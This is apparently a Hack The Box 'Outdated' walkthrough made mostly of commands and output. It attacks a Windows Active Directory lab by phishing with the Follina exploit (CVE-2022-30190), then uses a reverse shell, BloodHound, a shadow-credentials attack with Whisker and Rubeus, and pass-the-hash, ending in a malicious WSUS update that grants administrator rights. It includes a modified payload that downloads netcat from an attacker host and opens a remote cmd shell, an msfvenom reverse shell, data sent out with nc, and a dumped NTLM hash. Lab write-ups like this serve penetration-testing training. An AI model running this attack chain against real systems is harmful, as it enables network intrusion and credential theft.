HTB - Outdated [Medium]
Scanning
> TARGET=10.129.106.70 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-08-15 04:40:23Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-15T04:42:09+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
|_ssl-date: 2022-08-15T04:42:08+00:00; +6h59m56s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp open unknown syn-ack ttl 127
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49884/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49903/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49924/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
- Found some domains, add to /etc/hosts
10.129.106.70 outdated.htb mail.outdated.htb
Enum
- SMB
> enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
> smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
# RPC
> rpcdump.py -target-ip 10.129.106.70 outdated.htb > rpcdump.txt
# kerbute
> kerbrute userenum -d outdated.htb --dc 10.129.106.70 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
2022/08/14 18:47:52 > [+] VALID USERNAME: guest@outdated.htb
2022/08/14 18:49:16 > [+] VALID USERNAME: administrator@outdated.htb
> kerbrute bruteuser -d outdated.htb /usr/share/wordlists/rockyou.txt guest
shares
> smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
- Read the pdf,
itsupport@outdated.htbis a valid address and it takes links - Found a list of unpateched vulnerabilities,
CVE-2022-30190is exploitable. - https://github.com/JohnHammond/msdt-follina
# Change line 110
command = f"""Invoke-WebRequest http://<ip>/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe <ip> {args.reverse}"""
- Send email
swaks –to itsupport@outdated.htb –from meow@meow –server mail.outdated.htb –body “http://
/”
user: sflowers
> C:\Users\btables\Desktop>net users /domain
net users /domain
The request will be processed at a domain controller for domain outdated.htb.
User accounts for \\DC.outdated.htb
-------------------------------------------------------------------------------
Administrator btables Guest
krbtgt sflowers
The command completed successfully.
- Upload winpeas, found
wsusrunning
> certutil.exe -urlcache -f http://<ip>:8888/p.exe p.exe
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
bloodhound
- run sharphound on the target
> certutil.exe -urlcache -f http://<ip>:8888/SharpHound.exe SharpHound.exe
> SharpHound.exe -c All --zipfilename output.zip
> nc.exe <ip> 5555 < output.zip
- Analyse the output finds that btables belongs to the group it staff, and it staff has the privilege to AddCredentialLink to the user sflowers, who has psremote access to the DC.
Shadow credential attack
- Follow this guide https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
- Upload binaries for the attack
- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
> certutil.exe -urlcache -f http://<ip>:8888/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://<ip>:8888/Rubeus.exe Rubeus.exe
> Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password EeiO2gCCHgK5oiE4
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID a9b5f7d0-02aa-4059-9a13-8b1adc5555ff
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<base64-cert>
ServiceName : krbtgt/outdated.htb
ServiceRealm : OUTDATED.HTB
UserName : sflowers
UserRealm : OUTDATED.HTB
StartTime : 8/15/2022 8:14:44 AM
EndTime : 8/15/2022 6:14:44 PM
RenewTill : 8/22/2022 8:14:44 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : SttuGPI9lPahkYurkK8WUA==
ASREP (key) : C05C572660D227E2469ED5A20B141693
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
foothold: sflowers
- Now, login as the user sflowers and get the flag
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
pe: admin
- re-run sharphound, this is already the shortest path, no more hops needed
> SharpHound.exe -c All --zipfilename output.zip
> download C:\Users\sflowers\desktop\20220815091017_output.zip /root/workspace/Outdated/output.zip
- Check that update uses a non https wsus server
> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://wsus.outdated.htb:8530
> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
UseWUServer REG_DWORD 0x1
wsus attack
- i’m not a big fan of powershell, so i generated a reverse shell for easier operation (evil-winrm is also slower)
> msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f exe > payload.exe
SharpWSUS
- To exploit the vulnerability, use a tool called SharpWSUS, which will create an update and approve it for deployment to a machine, i.e dc.outdated.htb
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#wsus-deployment
> SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators sflowers /add\"" /title:"meowmeow"
> SharpWSUS.exe approve /updateid:0be19bc9-b3db-4186-915d-622e9789b272 /computername:dc.outdated.htb /groupname:"meowgroup"
> SharpWSUS.exe check /updateid:0be19bc9-b3db-4186-915d-622e9789b272 /computername:dc.outdated.htb